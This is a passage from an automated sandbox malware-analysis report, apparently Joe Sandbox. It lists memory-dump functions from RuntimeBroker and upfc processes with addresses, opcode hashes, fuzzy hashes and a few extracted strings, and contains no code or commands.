                                • API String ID:
                                • Opcode ID: 2aa06373c588958f288d7a96394d21ce15959b9ceedb8610328f8d1c83ade68f
                                • Instruction ID: c6ace5dabad8ecd12ef60bfa2166d5b3274131e54f39f13fd387b5aac1dc4d47
                                • Opcode Fuzzy Hash: 2aa06373c588958f288d7a96394d21ce15959b9ceedb8610328f8d1c83ade68f
                                • Instruction Fuzzy Hash: B7418D70D096598FEB55DFA4C864AEDBBB1FF4A300F1101BAD009D72AACB399981CF41
                                Function 00007FFD9B8B83F5 Relevance: .1, Instructions: 102COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000019.00000002.1766559723.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_25_2_7ffd9b8b0000_RuntimeBroker.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: e003b974fb99f75c57cfb232c7236ecac21d64b0a66a7e0c724713780b4c2dee
                                • Instruction ID: 841c50912140893046c0cf43bcb562c08c272aca38ae3e53d3f0154a6c1eabcc
                                • Opcode Fuzzy Hash: e003b974fb99f75c57cfb232c7236ecac21d64b0a66a7e0c724713780b4c2dee
                                • Instruction Fuzzy Hash: 4E315B31E0962E8FDB58DFA4D4646FEB7B1EF58310F11017AE019A32D5CA385A41CF91
                                Function 00007FFD9B8B2BC9 Relevance: .1, Instructions: 91COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000019.00000002.1766559723.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_25_2_7ffd9b8b0000_RuntimeBroker.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 08369939351e97a9d62d805df70290a1c39d4a45c59b786840828c976cba7225
                                • Instruction ID: 64f39b689dc0abcfb259b21754ae928f55c61ec6a161fe6cff74156d50e160c2
                                • Opcode Fuzzy Hash: 08369939351e97a9d62d805df70290a1c39d4a45c59b786840828c976cba7225
                                • Instruction Fuzzy Hash: C7312A70E0A65D8FDB55DFA8D8606EDBBB1FF59301F10057AE019E3291DB389941CB81
                                Function 00007FFD9B8B186A Relevance: .1, Instructions: 64COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000019.00000002.1766559723.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_25_2_7ffd9b8b0000_RuntimeBroker.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: fa0656c8f07a8f4ed4b9008ce63a973b64a4e458b764a3a5847623afb69d05a2
                                • Instruction ID: e9b9f61658df2410027c7902e4a96103d3a4fd71bdc67feb21cdb921bf1592d7
                                • Opcode Fuzzy Hash: fa0656c8f07a8f4ed4b9008ce63a973b64a4e458b764a3a5847623afb69d05a2
                                • Instruction Fuzzy Hash: 21110D31E2A52D8ED768EB60D4657FCB271FF06701F4110B9D04EA61A2CE356A44CF80
                                Function 00007FFD9B8B08B1 Relevance: .0, Instructions: 42COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000019.00000002.1766559723.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_25_2_7ffd9b8b0000_RuntimeBroker.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 967534f215c89adcdea066bd628afff681ca93b6a0bee11090503a032cd1183c
                                • Instruction ID: b7d25fad3fdb62016c98c28f9199eac6e32ee2131746b90aaa72002e8571677a
                                • Opcode Fuzzy Hash: 967534f215c89adcdea066bd628afff681ca93b6a0bee11090503a032cd1183c
                                • Instruction Fuzzy Hash: BBF02230A1964D8FE794EB7888A95EC7FB0EF88300F8105FAD408C61A2DF3816498B41
                                Function 00007FFD9B8B1F5D Relevance: .0, Instructions: 39COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000019.00000002.1766559723.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_25_2_7ffd9b8b0000_RuntimeBroker.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 2bbcd1004c88310f512072129159ed670e10f3c9551bbc66664b70b8cb2f14cf
                                • Instruction ID: b3dd33997ff545a3b8c5f8b4a0e67fddb5587f634228041c7caa2166d41074c7
                                • Opcode Fuzzy Hash: 2bbcd1004c88310f512072129159ed670e10f3c9551bbc66664b70b8cb2f14cf
                                • Instruction Fuzzy Hash: EBF02831A1E64D5FD751EB788C655EC7FA0EF48200F4101F6D418CB2E3DB28A949C781
                                Function 00007FFD9B8B1241 Relevance: .0, Instructions: 37COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000019.00000002.1766559723.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_25_2_7ffd9b8b0000_RuntimeBroker.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: c27bb3ca9f1c2fc609b5d40c53f8eacd38f7d0e0ac17b7e669fb430352200e87
                                • Instruction ID: c9dfec9c63295712f4ebe7c97c3728425da9bc93592a6970de723ad899e62fc2
                                • Opcode Fuzzy Hash: c27bb3ca9f1c2fc609b5d40c53f8eacd38f7d0e0ac17b7e669fb430352200e87
                                • Instruction Fuzzy Hash: B8F0BE3050E64D8FCB66EF24C8516E93BA0FF5A300F0501AAE41CCB196CB7ADA64CB81
                                Function 00007FFD9B8B8399 Relevance: .0, Instructions: 35COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000019.00000002.1766559723.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_25_2_7ffd9b8b0000_RuntimeBroker.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 6b91e7c98b9878ab8cf11bd1f0b471b09b2e3e49361a1c3e43fd0a9404036fa5
                                • Instruction ID: 55d01ff5bafa4e73ee4dfff47579ebfa46199806e6b158613a0b2589a0ba6d08
                                • Opcode Fuzzy Hash: 6b91e7c98b9878ab8cf11bd1f0b471b09b2e3e49361a1c3e43fd0a9404036fa5
                                • Instruction Fuzzy Hash: 7AF08C3180D68D8FEB51EB6888682ED7FF0FF19300F0504A7D018D60A2D7346544CB41
                                Function 00007FFD9B8B0528 Relevance: .0, Instructions: 31COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000019.00000002.1766559723.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_25_2_7ffd9b8b0000_RuntimeBroker.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 432d24d1fd1050ca00c0840a8a7201cd64d0db7f0804005701bda6b8cd227d0c
                                • Instruction ID: c14000dea9572f4d7f9f3dff157658dc6dd583c9076c943b63c4709b4fbfd70e
                                • Opcode Fuzzy Hash: 432d24d1fd1050ca00c0840a8a7201cd64d0db7f0804005701bda6b8cd227d0c
                                • Instruction Fuzzy Hash: B5F0823050960ECFDB69EF64D4116F577A0FF59304F000176E41CD71D6CA35A660CB81
                                Function 00007FFD9B8B81E0 Relevance: .0, Instructions: 29COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000019.00000002.1766559723.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_25_2_7ffd9b8b0000_RuntimeBroker.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 35853afa75b69b8af2630670ab5a25cd29eb57b7b51ebb0d863fcffa3e8693d1
                                • Instruction ID: 93c7a68d977ef0b3331224a72bb2fcc2e540af28af874aaf0a4721c2dcc070e6
                                • Opcode Fuzzy Hash: 35853afa75b69b8af2630670ab5a25cd29eb57b7b51ebb0d863fcffa3e8693d1
                                • Instruction Fuzzy Hash: A1E0DF7298DE5C8BDF64AB699C2029877B1FB8D308F01026EE48CC7191E7355EA6CB41
                                Function 00007FFD9B8B685C Relevance: .0, Instructions: 29COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000019.00000002.1766559723.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_25_2_7ffd9b8b0000_RuntimeBroker.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 5b18e3ae6d68f1bc2f74094ee4ecbd4cf08eb6e3b416cb339c5958d286e9631b
                                • Instruction ID: a0bda24ba1446f777d164d855fed1601e2c05d2f4986bf1417e8ded4d3dd6b5c
                                • Opcode Fuzzy Hash: 5b18e3ae6d68f1bc2f74094ee4ecbd4cf08eb6e3b416cb339c5958d286e9631b
                                • Instruction Fuzzy Hash: 36E0C03190DA0C4BCB509FAD9C602C873B0FB4C308F01026DD44CC71C1D3319544C741
                                Function 00007FFD9B8B1F15 Relevance: .0, Instructions: 29COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000019.00000002.1766559723.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_25_2_7ffd9b8b0000_RuntimeBroker.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 23ba22b8572c9bb666e20d31bca06677ba9c48c0ae40591f7c4364df5adebe8f
                                • Instruction ID: 8bebb03e8e9f82e6d93361e3adf8cf6e57b0d7ea40d1fe8a6e5ee34cc2699785
                                • Opcode Fuzzy Hash: 23ba22b8572c9bb666e20d31bca06677ba9c48c0ae40591f7c4364df5adebe8f
                                • Instruction Fuzzy Hash: 02E09B3185F69E4FD7216F6049651DD7B60FF05300F0616BBD0588A1D3D76C9618CB81
                                Function 00007FFD9B8B1C19 Relevance: .0, Instructions: 28COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000019.00000002.1766559723.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_25_2_7ffd9b8b0000_RuntimeBroker.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: d24992e485735ca18b3b10e06babd7af33ca46ad9845132f942a62b29df2134c
                                • Instruction ID: 1cc1f3f5f1927b86c6c415b5c3a98059dc78c018205414e97c9c95f8e4fe0153
                                • Opcode Fuzzy Hash: d24992e485735ca18b3b10e06babd7af33ca46ad9845132f942a62b29df2134c
                                • Instruction Fuzzy Hash: 4EF0A03194F39E4FDB626B6048A11D97B70FF06200F0A06BAD058CA1E3DA6896588782
                                Function 00007FFD9B8B2536 Relevance: .0, Instructions: 27COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000019.00000002.1766559723.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_25_2_7ffd9b8b0000_RuntimeBroker.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 861076b9b8e08a3fc39f9f92f7ad52cc1c98003d172323b3f9510822f9d4476c
                                • Instruction ID: f2b17b496262ebfd906a1944a39620664c78ce795186dde038c4a621c253532c
                                • Opcode Fuzzy Hash: 861076b9b8e08a3fc39f9f92f7ad52cc1c98003d172323b3f9510822f9d4476c
                                • Instruction Fuzzy Hash: 77F0197191485D4FDFA4DF24C854B99B3B1FB58344F1086E6900DE3155DA30AEC58F80
                                Function 00007FFD9B8B0530 Relevance: .0, Instructions: 21COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000019.00000002.1766559723.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_25_2_7ffd9b8b0000_RuntimeBroker.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 4052877536065a422ffdacf6b0f575e94888fbc971f21f8d59286a0c27209402
                                • Instruction ID: 54dc86a14f543349dc7700b5e0320e69aa6d7c8dd2378ae33cffcb442974c070
                                • Opcode Fuzzy Hash: 4052877536065a422ffdacf6b0f575e94888fbc971f21f8d59286a0c27209402
                                • Instruction Fuzzy Hash: BCE04F3051960ECFDBA8EF68C450AA677A1FF58304F100539E41CD6190CB35E6A0CFC0
                                Function 00007FFD9B8B0C61 Relevance: .0, Instructions: 19COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000019.00000002.1766559723.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_25_2_7ffd9b8b0000_RuntimeBroker.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 915a2728d9e7f5ebec5ed1afa031da61babc95869f818d8781a71a5c371f7729
                                • Instruction ID: 619ba90539dd75053b89fd44b3d6e99274cc688a065b3c0578aa223bfcdb4096
                                • Opcode Fuzzy Hash: 915a2728d9e7f5ebec5ed1afa031da61babc95869f818d8781a71a5c371f7729
                                • Instruction Fuzzy Hash: 5EE0EC31F1552D8EDB58EB98E8117EDB771FF85311F8005B1D11CE3596DA3069458B81

                                Non-executed Functions

                                Function 00007FFD9B8B06FA Relevance: 7.7, Strings: 6, Instructions: 190COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000019.00000002.1766559723.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_25_2_7ffd9b8b0000_RuntimeBroker.jbxd
                                Similarity
                                • API ID:
                                • String ID: =L_^$?L_I$L_^U$L_^X$L_^f$L_^g
                                • API String ID: 0-3399030255
                                • Opcode ID: f4801156bbce5df0b5c6c10c682d22bfe4ea4dfb296037fc788a2b4cf71e8952
                                • Instruction ID: 6a395c2d2ba314665f3511997b977dd68493e6623f08d83c5490d6e986db0b67
                                • Opcode Fuzzy Hash: f4801156bbce5df0b5c6c10c682d22bfe4ea4dfb296037fc788a2b4cf71e8952
                                • Instruction Fuzzy Hash: ED518EA3B1F6951BE76257ED2C210A87B50FF4566071502F7E098870F7FC16AA068BC1
                                Function 00007FFD9B8B06A5 Relevance: 6.5, Strings: 5, Instructions: 205COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000019.00000002.1766559723.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_25_2_7ffd9b8b0000_RuntimeBroker.jbxd
                                Similarity
                                • API ID:
                                • String ID: ?L_I$L_^J$L_^K$L_^f$L_^g
                                • API String ID: 0-841158015
                                • Opcode ID: 699f3f4d504d7e448c560192c95e249343456fd478254dd19af2af204ed72d29
                                • Instruction ID: 3c620171f82a6507c1976114c3ab05e2619944930ccd4038ad59ac6de986fbe3
                                • Opcode Fuzzy Hash: 699f3f4d504d7e448c560192c95e249343456fd478254dd19af2af204ed72d29
                                • Instruction Fuzzy Hash: 46519BA3B1F6990BE72617FD2C210B87750FF8566071506F7D098860E7F816AA068BC1

                                Executed Functions

                                Function 00007FFD9B885141 Relevance: 9.4, Strings: 7, Instructions: 624COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000028.00000002.1776015307.00007FFD9B885000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B885000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_40_2_7ffd9b885000_upfc.jbxd
                                Similarity
                                • API ID:
                                • String ID: "$"$-$[$]${$}
                                • API String ID: 0-2220975799
                                • Opcode ID: de2ae8f64f0a4fa1f2ea1d4bf198704dc24f33dcae20cfe0bee857e1363f8ac5
                                • Instruction ID: b2af73fa5cc8b6854275fdf79221039ddbff477ba7cabc50a078592d6fb4339f
                                • Opcode Fuzzy Hash: de2ae8f64f0a4fa1f2ea1d4bf198704dc24f33dcae20cfe0bee857e1363f8ac5
                                • Instruction Fuzzy Hash: 0642F770E1962D8FDBA8DF68C8A0BEDB7B1FF58301F5041A9D05DA7295DA385A81CF40
                                Function 00007FFD9B8806E0 Relevance: 6.5, Strings: 5, Instructions: 239COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000028.00000002.1776015307.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_40_2_7ffd9b880000_upfc.jbxd
                                Similarity
                                • API ID:
                                • String ID: =O_^$?O_I$O_^X$O_^f$O_^g
                                • API String ID: 0-2229697781
                                • Opcode ID: 56cc2341499588085a09a7b8df7d8cab37e19a38ced7b1f23c1be1877e21e17d
                                • Instruction ID: fbf69256339e3b5e536ce2b5ae9f784af813cbeed2d22d4396df743b16a04d68
                                • Opcode Fuzzy Hash: 56cc2341499588085a09a7b8df7d8cab37e19a38ced7b1f23c1be1877e21e17d
                                • Instruction Fuzzy Hash: E5618B63B0FA895FEB21679C7C651E83BA0FF85721B0501F7E06C8B1A7EC2469468381
                                Function 00007FFD9B8804F8 Relevance: 1.3, Strings: 1, Instructions: 53COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000028.00000002.1776015307.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_40_2_7ffd9b880000_upfc.jbxd
                                Similarity
                                • API ID:
                                • String ID: ?O_^
                                • API String ID: 0-1127923838
                                • Opcode ID: ef945f1706b72cf49d13fc5cc5572387a099ee51a8e78cabce076d5f4f9d5d45
                                • Instruction ID: bb51e7dd59e50f40135fd3801b95d70a1a48146bff9db65f52470e26cb1b2de1
                                • Opcode Fuzzy Hash: ef945f1706b72cf49d13fc5cc5572387a099ee51a8e78cabce076d5f4f9d5d45
                                • Instruction Fuzzy Hash: 5301D231A0A65E8FC756EF6898A15F637A0FF05318F04017AE06CCA193EE38A555C791
                                Function 00007FFD9B880F8D Relevance: .4, Instructions: 376COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000028.00000002.1776015307.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_40_2_7ffd9b880000_upfc.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: ba181aa6cab73085f19b26817d4fe8a7f4902917801f2f13d62318ac11b0ce4e
                                • Instruction ID: 0d74a80b5b9681a6fc47cf589b6e4c9d15549aca86ca205bc7f5987a41fafd13
                                • Opcode Fuzzy Hash: ba181aa6cab73085f19b26817d4fe8a7f4902917801f2f13d62318ac11b0ce4e
                                • Instruction Fuzzy Hash: 4DD14F71E19A5D8FDB5CEB58D8A4BACB7B1FF58300F0441B9E01DE32A6DA346981CB01
                                Function 00007FFD9B887C89 Relevance: .3, Instructions: 334COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000028.00000002.1776015307.00007FFD9B885000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B885000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_40_2_7ffd9b885000_upfc.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 1f2714a975064446f729abd9702cf0132e5ee17dc796f5dfa6066c0ee1c43a7c
                                • Instruction ID: 7ae412a47652c4476769e29d5205e4bcef8b1eafcfab996bed8db11ff97ee2dc
                                • Opcode Fuzzy Hash: 1f2714a975064446f729abd9702cf0132e5ee17dc796f5dfa6066c0ee1c43a7c
                                • Instruction Fuzzy Hash: 56C17B74A0A95D8FEBA5DBA8C4917BCB7B5FF58300F514179C01DD72E6CA386982CB40
                                Function 00007FFD9B883239 Relevance: .3, Instructions: 310COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000028.00000002.1776015307.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_40_2_7ffd9b880000_upfc.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: e3c6cf48eeaa5f4c9414de6ec970587e88acbe45c9d9bfbbc14e7a533df0a340
                                • Instruction ID: ea4b5eaa335638d88dd602e3a0051662426f968d1270de9ae65784296307a287
                                • Opcode Fuzzy Hash: e3c6cf48eeaa5f4c9414de6ec970587e88acbe45c9d9bfbbc14e7a533df0a340
                                • Instruction Fuzzy Hash: 60B15271E19A5D8FEB9CDB58D864BA8B7A1FF58300F0401B9E01DD72E6DE346981CB01
                                Function 00007FFD9B8805D8 Relevance: .3, Instructions: 281COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000028.00000002.1776015307.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_40_2_7ffd9b880000_upfc.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 01bbf8e50bf36370b69fb5aa69bd9ef99db34f326d0c652107f9ccd778e1ff16
                                • Instruction ID: 5508ef69b63f5e3adaf1975dd8308f1c9f0e47ddbfa512388eaa37b1b539d82e
                                • Opcode Fuzzy Hash: 01bbf8e50bf36370b69fb5aa69bd9ef99db34f326d0c652107f9ccd778e1ff16
                                • Instruction Fuzzy Hash: BB81C231B1DE494BDB68EF5888605B977E2FF9C704B15417EE46EC32A2DE34AD028781
                                Function 00007FFD9B886163 Relevance: .2, Instructions: 200COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000028.00000002.1776015307.00007FFD9B885000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B885000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_40_2_7ffd9b885000_upfc.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: ecbf832a4015b4cbd56303d7cd1eb1aefb5fa69fafe6e979adc6b4593b504dc1
                                • Instruction ID: 84e668674e656b40a43145a0df88f47555c7a61f7922d4376e3fc47ff40b9874
                                • Opcode Fuzzy Hash: ecbf832a4015b4cbd56303d7cd1eb1aefb5fa69fafe6e979adc6b4593b504dc1
                                • Instruction Fuzzy Hash: 8B719570E1491D8FDB94EFA8D895BECB7B1FF58300F5041BAD41DE3296DA3469818B41
                                Function 00007FFD9B885931 Relevance: .2, Instructions: 196COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000028.00000002.1776015307.00007FFD9B885000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B885000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_40_2_7ffd9b885000_upfc.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 016a02d74ec76b5b1258067aafc7a02c73bae2b7835272ebc8320e505d1cf70d
                                • Instruction ID: af43c7a68a913aaffb2a35d3ef3fdb6e7e3de5ff2b04829f7ad9ae145fd01d44
                                • Opcode Fuzzy Hash: 016a02d74ec76b5b1258067aafc7a02c73bae2b7835272ebc8320e505d1cf70d
                                • Instruction Fuzzy Hash: 6751D730A09A8D8FDB95DFA8D464AADBBF1EF59310F1404BAE01DD72D6CA34A841C741
                                Function 00007FFD9B88129D Relevance: .2, Instructions: 185COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000028.00000002.1776015307.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_40_2_7ffd9b880000_upfc.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 5ae674243f1d554a8079076d9a8941308ff9d3c1027d4da7409e95daaa2f6bc4
                                • Instruction ID: cc33624e63c8a795ed916fe0597753e52f242293ae017d1f46691da0bc5a88ff
                                • Opcode Fuzzy Hash: 5ae674243f1d554a8079076d9a8941308ff9d3c1027d4da7409e95daaa2f6bc4
                                • Instruction Fuzzy Hash: 7051C031B18A8E4FDB58DF1888645BA77E2FF9C304B15417EE46EC7292DE34E9028781
                                Function 00007FFD9B882CD9 Relevance: .2, Instructions: 167COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000028.00000002.1776015307.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_40_2_7ffd9b880000_upfc.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 560e0246001dc2aa6563182902685101808f3b659950fc0c388b1228830068c0
                                • Instruction ID: f7265e2cbb0f54c24ec97903a3b5348035567ebd98c9c27d109c1ad97466bcd2
                                • Opcode Fuzzy Hash: 560e0246001dc2aa6563182902685101808f3b659950fc0c388b1228830068c0
                                • Instruction Fuzzy Hash: 0E513071A1995D8FDB94EF98C865AECBBF1FF59300F41016AE01DE72A2CA74A941CB40
                                Function 00007FFD9B88238D Relevance: .2, Instructions: 158COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000028.00000002.1776015307.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_40_2_7ffd9b880000_upfc.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 2b89370e2952cc273fd3db967a1130128942482fd146c274e563e831a05ae1f7
                                • Instruction ID: e42320d363b096e4bc3dc24d4f0cb25a7be45edd2e246bc79bc0301f27b7d00e
                                • Opcode Fuzzy Hash: 2b89370e2952cc273fd3db967a1130128942482fd146c274e563e831a05ae1f7
                                • Instruction Fuzzy Hash: EF51C661A0EA994FE7A29BA88C757A87BA0EF59300F0540F7D09CC71E7DE346A85C741
                                Function 00007FFD9B886C5E Relevance: .1, Instructions: 127COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000028.00000002.1776015307.00007FFD9B885000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B885000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_40_2_7ffd9b885000_upfc.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 32e2d9b639845a432b1c176571f1de4048dba24c288be9898b326255259af0ff
                                • Instruction ID: 379cf16fca9f92da17b3547fca1c4c74dba3c2816229b7487d8cb65abaab4337
                                • Opcode Fuzzy Hash: 32e2d9b639845a432b1c176571f1de4048dba24c288be9898b326255259af0ff
                                • Instruction Fuzzy Hash: 08410E71E0995D8FDF94EFA8C899AACB7F1FF68300F500169D01DE7295DA35A881CB40
                                Function 00007FFD9B881828 Relevance: .1, Instructions: 116COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000028.00000002.1776015307.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_40_2_7ffd9b880000_upfc.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 2957f27167f2bcdf61b10592efc8bd3d800d2879cb405db88ff17afee2cac51a
                                • Instruction ID: cfecb87381bc0584b196ba68d82882aaf02ce97d1dba5682117e0c51c367ed29
                                • Opcode Fuzzy Hash: 2957f27167f2bcdf61b10592efc8bd3d800d2879cb405db88ff17afee2cac51a
                                • Instruction Fuzzy Hash: E8317530E1EA1D8BE774BB9494227F8B2A1FF4D700F410279D06E921E5CF396A45C680
                                Function 00007FFD9B881CA9 Relevance: .1, Instructions: 109COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000028.00000002.1776015307.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_40_2_7ffd9b880000_upfc.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
